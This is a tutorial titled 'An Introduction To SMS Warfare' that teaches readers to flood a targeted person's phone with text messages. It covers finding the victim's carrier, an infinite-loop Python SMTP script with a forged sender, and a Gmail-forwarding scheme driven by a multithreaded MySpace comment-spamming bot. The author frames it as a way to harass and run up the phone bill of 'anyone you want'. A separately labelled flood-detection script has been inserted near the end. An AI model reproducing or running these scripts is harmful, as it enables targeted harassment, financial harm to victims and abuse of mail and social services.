An Introduction To SMS Warfare

by James Penguin
The purpose of the following article is to take you through the process of carrying out a *controlled* SMS flood against a single target. I will cover how to identify your target’s service provider, and two separate methods of attack. If you are unfamiliar with the concept of SMS flooding, I would suggest you read, “Creating and Utilizing an SMS Flooder” by Halla which can be found here on InformationLeak.

[ A Brief Review ]
Before we begin, a brief explanation of how this works. Every cell phone that supports SMS has its own email address; the format of that address is:

1+(Area Code)+(Phone Number) @(Service Provider’s SMS Gateway)

So the address for the phone number (555) 867-5309 where T-Mobile is the service provider would be 15558675309@tmomail.net. By sending an email to this address, the phone it is associated with will receive a text message. And therein lies the potential for abuse.
NOTE: If the message sent is larger than the maximum size of a text message (Typically 160 characters) the message will be received as a picture message instead.
NOTE2: Depending on the service provider of your target, prefixing the address with a 1 may not work. Some providers, such as T-Mobile use it; and some providers, such as Verizon do not.

[ Identifying the Service Provider ]
The obvious first step in an SMS flood is identifying your target’s service provider. There are 2 methods of doing this, the first of which is just good ol’ fashioned social engineering. If you know your target personally, sending them a message along the lines of, “Agh my cell bill is ridiculous I hate who do you use?” will usually yield the desired info. However, there are a few flaws with that strategy. First off, it relies heavily on chance; it could give you away later on as the attacker; and finally, it just isn’t stealthy. Luckily for us, the White Pages’ reverse phone number lookup system lists not only the type of line for the number you search, but also the provider. So head on over to http://www.whitepages.com/reverse_phone, plug in your target’s phone number, and whammo, you now know their service provider. But just knowing your target’s service provider isn’t enough; you’ll also need to identify the SMS gateway for their particular service provider. A big list of service providers and their associated SMS gateways can be found at http://net127.com/notes/index.php?title … teway_List. So for example, the SMS gateway for T-Mobile USA would be tmomail.net, which would mean that if your target’s phone number is (555) 867-5309, then their phone’s email address would be 15558675309@tmomail.net. And with that, you are now ready to begin your attack!

[ Method One: Direct Interface with a SMTP Server ]
Now the simplest method of course would be to telnet into a SMTP server and then send your messages. However telnetting in by hand and sending the messages one by one isn’t very efficient. That’s where a little Python magic comes into play, everything you’ll need to execute the flood can be done using the Python interpreter. So if you don’t already have it, go download and install Python from http://python.org and fire up the interpreter. Now use the following example as a guide for your own flood.

Python 2.4.3 (#1, Jul 26 2006, 20:13:39)
[GCC 3.4.6] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.
>>> import smtplib
>>> smtp_server = “smtp.server.whatever”
>>> from_address = “god@heaven.org” # this can be whatever you like
>>> to_address = “1558675309@tmomail.net” # the target phone’s email address
>>> message = “:)” # Gonna send that girl a smiley face, girls love smiley faces
>>> s = smtplib.SMTP()
>>> s.connect(smtp_server)
>>> while True: # creates an infinite loop
… s.sendmail(from_address,to_address,message)
… print “Message sent!”

Message sent!
Message sent!

It’s that simple! Unfortunately, there are a couple problems with this method of attack. First of course is that you’ll only be able to get off about 50 messages before you’re banned from the server for spamming, and second is that you have to directly connect to the server and thus are being logged. While you could use a proxy, there’s an easier, and trickier method that requires no proxies and is just as effective.

[ Method Two: Forwarding Gmail With a MySpace Twist ]
First off, register an account with Gmail, and then create a MySpace account using your newly created Gmail account as the email address. Next go to the account settings for your new MySpace profile, and enable the following:

– Do not send me MySpace newsletters
– Under Privacy Settings:
– Friend Requests – Require email or last name
– Blog Comments – Friends Only
– And everything for the Group Invite and Event Invite privacy settings
– Under IM Privacy Settings:
– Select the radio button next to “No one can IM me.”
– And everything for Block IM Invites From settings

The goal of all these settings is to make it so that the only email you actually receive from MySpace are alerts for when you receive a profile comment. The next step is to use another MySpace account to become friends with the one you’ve just created.

Finally, set up your Gmail account to forward email it receives to your target phone’s email address. This is done by going to Settings > Forwarding and POP, and then selecting the radio button next to where it says “Forward a copy of incoming mail to”. Obviously now you enter the target phone’s email address, and it doesn’t really matter whether or not you keep a copy in the Gmail inbox. Lastly click “Save Changes” and you’re done.

With all these configurations complete you should now have a MySpace profile, that for every comment it receives will send a picture message (remember how I mentioned messages exceeding 160 characters are received as a picture message?) to your target’s phone. Thus creating a SMS flood is accomplished by spamming your newly created profile with comments. And wouldn’t you know it, I’ve already got a Python script to do just that! (Oh and it’s multi threaded to boot!)

  1. #!/usr/bin/env python
  2. import urllib2, ClientForm, threading, sys
  3. email = “” # Email address of account to post comments
  4. password = “” # Password of account to post comments
  5. friendID = “” # Friend ID of recipient of comments
  6. message = “” # Message to leave in comments
  7. thread_limit = 40 # Number of bots to run in parallel
  8. class postComment(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): print “Posting comment %d!” % counter
  9. req = urllib2.Request(“http://comment.myspace.com/index.cfm?fuseaction=user.viewProfile_commentForm&friendID=%s” % friendID)
  10. res = opener.open(req)
  11. forms = ClientForm.ParseResponse(res)
  12. form = forms[1]
  13. form[“ctl00$cpMain$postComment$commentTextBox”] = message
  14. res = opener.open(form.click())
  15. forms = ClientForm.ParseResponse(res)
  16. form = forms[1]
  17. opener.open(form.click())
  18. # login
  19. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
  20. opener.addheaders = [(‘User-agent’, ‘Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)’)]
  21. urllib2.install_opener(opener)
  22. req = urllib2.Request(“http://login.myspace.com/index.cfm?fuseaction=login.process”)
  23. res = opener.open(req)
  24. forms = ClientForm.ParseResponse(res)
  25. form = forms[1]
  26. form[“email”] = email
  27. form[“password”] = password
  28. opener.open(form.click())
  29. # post comment
  30. counter = 0
  31. while 1:
  32. try:
  33. if threading.activeCount() < thread_limit:
  34. print counter
  35. postComment().start()
  36. counter+=1
  37. sys.stdout.write(“\r%d Comments Posted.” % counter)
  38. sys.stdout.flush()
  39. except KeyboardInterrupt: break

In order to run the script above, you’ll need to download the ClientForm module, found at http://www.clientform.com. Just extract ClientForm.py into the same directory as the script above. Now to begin your attack, modify the necessary variables in commenter.py and then execute it.
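
Seen from the receiving side, both methods above produce the same signal: many messages for one phone arriving at a gateway address in a short time, which is what the ban mentioned under Method One reacts to. The following is an added example, not part of the original article: a sliding-window counter keyed on the destination phone, run over constructed log records. The record layout, the 50-message threshold, the 10-minute window and the one-entry gateway set are assumptions.

```python
from collections import defaultdict, deque

# Assumption: gateways to watch; tmomail.net is the one named in the article.
SMS_GATEWAYS = {"tmomail.net"}
MAX_PER_WINDOW = 50    # assumed threshold
WINDOW_SECONDS = 600   # assumed window length

def normalise_recipient(addr):
    """Return (ten_digit_number, gateway) for an SMS-gateway address, else None."""
    local, _, domain = addr.strip().lower().rpartition("@")
    if domain not in SMS_GATEWAYS:
        return None
    digits = "".join(ch for ch in local if "0" <= ch <= "9")
    # Some providers use a leading 1 and some do not (NOTE2); count both as one phone.
    if len(digits) == 11 and digits.startswith("1"):
        digits = digits[1:]
    return (digits, domain) if len(digits) == 10 else None

def detect_floods(records, limit=MAX_PER_WINDOW, window=WINDOW_SECONDS):
    """records: (epoch_seconds, client_ip, rcpt_to) tuples sorted by time.
    Returns {(number, gateway): time the limit was first exceeded}."""
    recent = defaultdict(deque)   # per-phone timestamps inside the window
    alerts = {}
    for ts, _client_ip, rcpt in records:
        key = normalise_recipient(rcpt)
        if key is None:
            continue              # not addressed to a watched gateway
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()           # drop timestamps that fell out of the window
        # Keyed on the phone, so the count holds across senders and relays.
        if len(q) > limit and key not in alerts:
            alerts[key] = ts
    return alerts

def sample_records():
    """Constructed sample: 60 messages in one minute to one phone, plus normal mail."""
    recs = []
    for i in range(60):
        rcpt = "15558675309@tmomail.net" if i % 2 else "5558675309@TMOMAIL.NET"
        recs.append((1000 + i, "192.0.2.%d" % (i % 3 + 1), rcpt))
    recs.append((1005, "192.0.2.9", "5550100123@tmomail.net"))
    recs.append((1010, "192.0.2.9", "alice@example.org"))
    return sorted(recs)

if __name__ == "__main__":
    for (number, gateway), when in detect_floods(sample_records()).items():
        print("flood suspected: %s via %s at t=%d" % (number, gateway, when))
```
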

[ Close ]
There you have it, two sure fire ways to piss off and rack up the phone bill of anyone you want. Just don’t go getting yourselves arrested. With that I bid you good day, and may the fortunes of war smile upon you.